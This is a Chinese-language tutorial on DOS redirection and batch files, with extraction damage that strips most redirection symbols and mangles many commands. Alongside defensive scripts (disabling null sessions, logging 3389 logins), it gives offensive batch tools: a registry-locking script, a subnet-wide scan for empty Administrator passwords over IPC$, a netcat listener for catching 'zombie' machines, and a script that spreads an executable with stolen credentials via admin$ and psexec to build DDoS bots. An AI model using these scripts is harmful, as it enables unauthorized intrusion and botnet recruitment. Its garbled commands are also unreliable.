1、dos 的重定向命令2006-10-15 16:47新手 DOS 应用技巧人小鬼大 重定向命令在安全方面的应用来源:ChinaITLab 收集整理2005-7-21 11:12:00大家知道,DOS 下有一个不为大家所常用的命令重定向命令,这个小东西非常有用,该命令同样可以用于 Win9x/ME/2000/XP 下,灵活的使用这个命令可以给我们带来很大的方便无论是入侵还是防守抑或是系统应用,都会带来很大的便利。今天就让 我们来看几个重定向命令在安全方面的应用实例。一、命令格式DOS 的标准输入输出通常是在标准设备键盘和显示器上进行的,利用重定向,可以方便地将输入输出改向磁盘文件或其它设备。其中
2、:1.大于号“”将命令发送到文件或设备,例如打印机prn。使用大于号“”时,有些命令输出(例如错误消息)不能重定向。2.双大于号“”将命令输出添加到文件结尾而不删除文件中已有的信息。3.小于号“4 可能不能够在 DOS 下使用。二、重定向命令的输出几乎所有的命令均将输出发送到屏幕。即使是将输出发送到驱动器或打印机的命令,也会在屏幕上显示消息和提示。要将输出从屏幕重定向到文件或打印机,请使 用大于号()。大多数命令中均可以使用大于号。例如,在以下命令中,dir 命令生成的目录列表重定向到 Dirlist.txt 文件: dirdirlist.txt,如果Dirlist.txt 文件不存在,系统将
3、创建该文件。如果 Dirlist.txt 存在,系统将使用 dir 命 令的输出替换文件中的信息。要将命令输出添加到文件结尾而不丢失文件中的任何信息,请使用双大于号()。例如, 在以下命令中,dir 命令生成的目录列表附加到 Dirlist.txt 文件中:dirdirlist.txt,将输入重定向到一个命令,就象可以 将命令输出发送到文件或打印机而不是屏幕一样,您可以从文件而不是从键盘获取命令的输入。要从文件获取输入,请使用小于号(123.regecho.123.regecho HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPo
4、liciesSystem123.regecho “DisableRegistryTools“=dword:00000001123.regREGEDIT /S /C 123.regdeltree /y 123.reg另存为以.bat 为扩展名的批处理文件,点击这个文件注册表就会被锁定!在上面的命令中,echo 是 DOS 下的回显命令,在它的前面加上“”前缀字符,表示执行时本行在命令行或 DOS 里面不显示,如果想看到程序执行过程, 请将“”去掉。大家在编写上述代码时要注意的是,第一行中的“REGEDIT4”一定要用大写字母,在第二行中“echo”和“.”之间没有空格。 “”产生的内容将追加到它
5、后面的文件中。在文件的最后一行加上 deltree /y 123.reg,就可以无需确认就删除 123.reg 文件。要想给注册表解锁,可以编辑这个批处理文件,只需将 “DisableRegistryTools“=dword:00000001 改为“DisableRegistryTools“=dword: 00000000,其他内容不变,保存为.bat 文件,点击就可以给注册表解锁了。2.把登陆 3389 的机器 IP 记录下来把下面的内容保存为 3389IP.bat:time /t log.lognetstat -n -p tcp |find “:3389“Log.logstart Expl
6、orer运行 3389IP.bat,然后查看 log.log 文件即可看到登陆 3389 的机器 IP,是不是很方便呢?3.恢复 DOS 实模式大家知道,某些恶意网页会修改浏览者的注册表,在无所不用其极的各种手段中,修改注册表使 DOS 实模式不可用是其中的招数之一。要想恢复 DOS 实模式方法有很多,用批处理和重定向命令结合使用,是比较特别的一招,在此与大家分享。echo offecho REGEDIT4c:scanreg.regecho.lock.regecho HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionPoliciesW
7、inOldAppc:scanreg.regecho “NoRealMode“=dword:00000000c:scanreg.regregedit /s c:scanreg.regdel c:scanreg.reg另存为以.bat 为扩展名的批处理文件,点击这个文件就可以恢复 DOS 实模式,那些 DOS 应用程序又可以使用了。4.等待肉鸡上门每天费时费力的找肉鸡是不是很辛苦,利用重定向命令和批处理文件就可以让你简单的找到肉鸡!方法是用记事本新建一个文本文件,输入如下内容:echo off:startnc -vv -w 5 -l -p 80rouji.loggoto start保存为.bat
8、文件(事先得准备好一个 nc.exe 文件,它是网络故障事件检测软件Netcat 的主程序),然后运行此程序之后,你就等着肉鸡上门主动来找你吧!运气好的话,每天 10 个不成问题。5.快速进行空连接空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。使用命令 net use IPipc$ “ /user:“ 就可以简单地和目标建立一个空连接(需要目标开放 IPC$)。利用重定向命令和 for 命令就可以对一个 C 类网段进行快速的空连接,并把结果保存到一个文件 中供你分析。方法是用记事本编辑如下内容的文件:echo offecho 格式:test *.*.*te
9、st.txtfor /L %G in (1 1 254) do echo %1.%G test.txt & net use %1.%Gipc$ “ /use:“Administrator“ | find “命令完成“ test.txt批处理文件保存为.bat,运行即可。这个批处理文件的功能是对你指定的一个C 类网段中的 254 个 ip 依次试建立帐号为 administrator 口令 为空的 ipc$连接,如果成功就把结果记录在 test.txt。这样就实现了 NT 弱口令扫描功能!其中,for 命令的功能是对一组文件中的每一个文件执行 某个特定命令,也就是可以用你指定的循环范围生成一系列
10、命令。For 命令的格式为:FOR %variable IN (set) DO command command-parameters,具体的含义:%variable:指定一个单一字母可替换的参数。(set):指定一个或一组文件。可以使用通配符。command:指定对每个文件执行的命令。command-parameters:为特定命令指定参数或命令行开关。在批处理文件中使用 FOR 命令时,指定变量请使用%variable 而不要用%variable。变量名称是区分大小写的,所以%i 不同%I。6.禁止空连接空连接的存在对有一定的危险,所以我们还是禁止它为好!方法是输入 net share 察看
11、本地共享资源,接下来输入如下命令删除共享:net share ipc$ /deletenet share admin$ /deletenet share c$ /deletenet share d$ /delete(如果有 e,f 等盘符可以同法删除)然后用记事本新建一个文本文件,输入如下内容即可:echo REGEDIT4123.regecho.123.regecho HKEY_LOCAL_MACHINESystemCurrentControlSetControlLSA123.regecho “RestrictAnonymous“=dword:00000001123.regREGEDIT /
12、S /C 123.regdeltree /y 123.reg另存为以.bat 为扩展名的批处理文件,点击这个文件就可以禁止空连接。7.扫描所有和本机以 TCP 协议连接的计算机扫描自己的计算机端口,发现有特殊端口打开,可以查木马,不仅如此,利用下面这个批处理文件还可以把所有和本机以 TCP 协议连接的计算机 IP 地址都记录下来。这个.bat 文件内容如下:data /t123.logtime /t123.lognetstat -n -p tcp 10123.log这样不仅可以记录下对方的 IP,还有时间和日期,方便自己查看。8.自动获取 DDoS 肉鸡DDoS 是 Distributed D
13、enial of Service 的缩写,意即分布式拒绝服务攻击。它是指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动 DoS 攻击,从 而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃帐号将 DDoS 主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯, 代理程序已经被安装在 Internet 上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术,主控程序能在几秒钟内激活成百上千次代理 程序的运行。虽然不建议大家使用 DDoS 方式攻击,但作为技术掌握还是很有必要的。可是,如何才能获取进行 DDoS 攻击的肉鸡呢?
14、把下面的内容保存为 ok.bat 文件就可以达到目的了:echo offecho 自动获取 DDoS 肉鸡for /f “tokens=1,3*“ %i in (host.txt) do net use %kipc$ /user:“%j“copy %1 %iadmin$sysytem32if errorelevel 0 goto successpsexec -d %i c:winntsystem32%1net user %iipc$ /del:successecho -success.txtecho 肉鸡:%isuccess.txtecho 用户名:%jsuccess.txtecho 密码:%ksuccess.txtecho -success.txt使用方法是 ok.bat *.exe host.txt,其中 host.txt 的格式为:ip administrator password。好了,快试试吧。但不要用来干破坏哦。其实,本文所说的方法主要是利用了批处理和相关的命令,重定向命令在其中只是个“传接剂”,起连接作用,但它的功劳也是不小的,所以我们不要忘了重定向命令哦。本文只是抛砖引玉,希望大家畅所欲言,多多指点。在写作时参阅过众多高手的论坛帖子,多谢各位。